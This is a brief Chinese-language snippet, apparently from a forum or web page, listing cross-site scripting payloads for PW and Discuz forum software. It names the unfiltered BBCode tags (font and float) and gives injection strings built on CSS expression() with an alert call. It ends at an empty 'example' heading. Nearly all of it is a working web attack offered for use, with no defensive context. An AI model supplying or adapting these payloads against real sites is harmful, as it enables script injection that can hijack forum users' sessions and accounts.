登 陆
PW论坛的FONT FACE字体没过滤:
跨站代码:[font=expression(alert('XSS'))]xss[/font]
DZ论坛的float浮动属性没过滤:
跨站代码:[float=expression(alert('XSS'))]xss[/float]
实例: